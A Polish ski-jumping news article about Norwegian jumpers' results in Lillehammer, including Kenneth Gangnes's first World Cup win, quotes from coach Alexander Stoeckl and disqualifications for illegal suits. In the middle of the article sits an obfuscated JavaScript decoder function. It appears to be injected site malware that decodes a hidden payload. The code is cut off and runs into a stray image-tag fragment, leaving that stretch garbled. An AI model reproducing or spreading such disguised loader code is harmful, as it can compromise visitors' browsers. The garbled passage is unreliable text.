You are currently viewing Udany weekend Norwegów, Gangnes: „Spełniłem marzenie małego chłopca”

Udany weekend Norwegów, Gangnes: „Spełniłem marzenie małego chłopca”

Gangnes Kenneth WC.Planica.2015 fot.Julia .Piatkowska - Udany weekend Norwegów, Gangnes: "Spełniłem marzenie małego chłopca"Miniony weekend Norwegowie zaliczą do udanych z racji sukcesów jakie odnieśli na obiekcie normalnym Lysgardsbakken w Lillehammer. Sobotni konkurs trwał ponad dwie godziny i ostatecznie udało się rozegrać jedną serię. W niedzielę rozegrano pełne zawody. Czyżby wyniki Norwegów świadczyły o postępującej dominacji w tym sezonie?

 

Kenneth Gangnes Lillehammer opuszczał z ogromnym uśmiechem na twarzy, drugie miejsce w loteryjnym sobotnim konkursie, zaledwie 0,1 punktu za triumfatorem, Severinem Freundem, oraz laur zwycięzcy w niedzielnych zmaganiach okazały się najlepszymi miejscami w karierze 26-letniego skoczka. Trzeba wspomnieć, że los nie oszczędzał Gangnesowi kontuzji – dwukrotnie doświadczył zerwania więzadeł krzyżowych. Kenneth już latem prezentował wysoki poziom sportowy – w klasyfikacji generalnej Letniej Grand Prix zajął drugie miejsce. Jak widać, dobra forma wciąż się utrzymuje.

WC.Lillehammer.2015.podium.2nd.comp Prevc Gangnes Forfang fot.Julia .Piatkowska 300x200 - Udany weekend Norwegów, Gangnes: "Spełniłem marzenie małego chłopca"
Niedzielne podium w Lillehammer (od lewej: Prevc, Gangnes, Forfang), fot. Julia Piątkowska

- To drugie miejsce jest dla mnie niczym pierwsze, to mój najlepszy wynik w mojej sportowej karierze. Sumiennie trenowaliśmy całe lato, nasza drużyna ma w sobie ducha walki – mówił w sobotę Gangnes, a w niedzielę, po zwycięstwie, było jeszcze lepiej: - Nie wiem co powiedzieć, to jest niewiarygodna rzecz, że odniosłem swoje pierwsze zwycięstwo w konkursie Pucharu Świata. Moim celem na ten sezon jest bycie w pierwszej dwudziestce konkursów i to się nie zmieni. Spełniłem jedno z marzeń, jakie tkwiło we mnie od małego chłopca - cieszył się w niedzielę.

Co według Gangnesa jest źródłem dobrej formy Norwegów? - Nasz zespół ma wielu młodych skoczków, których rozpiera energia, i to jest jeden z powodów naszych sukcesów.

- Udany weekend Norwegów, Gangnes: "Spełniłem marzenie małego chłopca"function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Stoeckl, fot. Stefan Piwowar" src="http://www.skokipolska.pl/wp-content/uploads/2013/02/stoeckl_alex_s.piwowar-300x200.jpg" alt="Alexander Stoeckl, fot. Stefan Piwowar" width="300" height="200" /> Alexander Stoeckl, fot. Stefan Piwowar

Pod wrażeniem występu Kennetha był także trener, Alexander Stoeckl, który doskonale pamięta problemy zdrowotne swojego podopiecznego: - Gangnes jest z pewnością jedynym zawodnikiem, któremu udało się dokonać takiej niesamowitej rzeczy. Nie umniejszam Andersowi Jacobsenowi, który również powrócił do sportu po identycznej kontuzji, jednak Kenneth powrócił na szczyt po dwóch operacjach tego samego typu, to jest sensacja medyczna.

Andreas Stjernen, który w sobotę zajął trzecie miejsce, również nie krył wielkiej radości: - Jestem bardzo szczęśliwy, to moje drugie podium w karierze, miałem dobre warunki, więc oddałem dobry skok. W niedzielę chcę powtórzyć to jeszcze raz - przyznawał w sobotę. Niestety nie dane było Norwegowi pokazanie po raz kolejny dobrej dyspozycji – został zdyskwalifikowany.

forfang LGP Wisła 2015 fot. MO 300x200 - Udany weekend Norwegów, Gangnes: "Spełniłem marzenie małego chłopca"
Johann Andre Forfang, fot. Martyna Osuchowska

W niedzielę Norwegowie również zdominowali podium, wpuszczając pomiędzy siebie jedynie Słoweńca, Petera Prevca (2. miejsce). Na najniższym stopniu stanął Johann Andre Forfang, dla którego był to drugi raz na „pudle”: - Czuję się na podium bardzo dobrze, to był udany konkurs w równych warunkach. Na początku byłem trochę rozczarowany, że rozegramy konkurs na normalnym obiekcie, jednak ostatecznie cieszę się, że dzięki temu udało się przeprowadzić dwa konkursy.

Jedynym cieniem, jaki kładzie się na konkursach w norweskim Lillehammer, jest dyskwalifikacja czterech skoczków gospodarzy (Espen Roee, Halvor Egner Granerud, Joacim Oedegaard Bjoereng, Joachim Hauer) w sobotę oraz jednego w niedzielę (Andreas Stjernen) za nieprzepisowe kombinezony. Na ten temat wypowiedział się trener, Alexander Stoeckl: - Szkoda tych dyskwalifikacji, to jest zła reklama dla naszego sportu. Przechodziliśmy kontrolę kombinezonów wiele razy. Znamy obowiązujące przepisy. Nie ma miejsca na oszustwa – komentuje Stoeckl.

 

źródło: fis-ski.com / vg.no

 

Dodaj komentarz